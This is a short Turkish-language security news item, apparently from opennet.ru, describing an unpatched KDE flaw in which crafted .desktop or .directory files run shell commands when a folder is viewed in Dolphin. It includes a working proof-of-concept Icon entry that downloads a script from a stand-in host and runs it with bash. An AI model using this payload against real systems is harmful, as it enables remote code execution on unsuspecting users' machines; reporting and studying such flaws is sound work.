KDE'de Bu, bir kullanıcı özel olarak tasarlanmış ".desktop" ve ".directory" dosyalarını içeren bir dizini veya arşivi görüntülediğinde saldırganın rastgele komutlar yürütmesine olanak tanır. Saldırı, kullanıcının Dolphin dosya yöneticisindeki dosyaların bir listesini görüntülemesini, kötü amaçlı bir masaüstü dosyasını indirmesini veya bir kısayolu masaüstüne veya bir belgeye sürüklemesini gerektirir. Sorun, kütüphanelerin mevcut sürümünde kendini gösteriyor ve KDE 4'e kadar olan eski sürümler. Güvenlik açığı hala devam ediyor (CVE atanmamış).
Sorun, KDesktopFile sınıfının yanlış uygulanmasından kaynaklanmaktadır; bu sınıf, "Icon" değişkenini işlerken, uygun kaçış olmadan, değeri, işleme de dahil olmak üzere kabuk özel karakterlerinin genişletilmesini gerçekleştiren KConfigPrivate::expandString() işlevine iletir. yürütülecek komutlar olarak “$(..)” dizelerini kullanın. XDG spesifikasyonunun gerekliliklerinin aksine, uygulama Kabuk yapıları, ayarların türü ayrılmadan üretilir; yalnızca başlatılacak uygulamanın komut satırını belirlerken değil, aynı zamanda varsayılan olarak görüntülenen simgeleri belirlerken de kullanılır.
Mesela saldırmak için kullanıcıya şöyle bir ".directory" dosyası içeren bir dizini içeren bir zip arşivi gönderin:
[Masaüstü Girişi] Tür=Dizin
Simge[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Arşiv içeriğini Dolphin dosya yöneticisinde görüntülemeye çalıştığınızda https://example.com/FILENAME.sh betiği indirilecek ve çalıştırılacaktır.
Kaynak: opennet.ru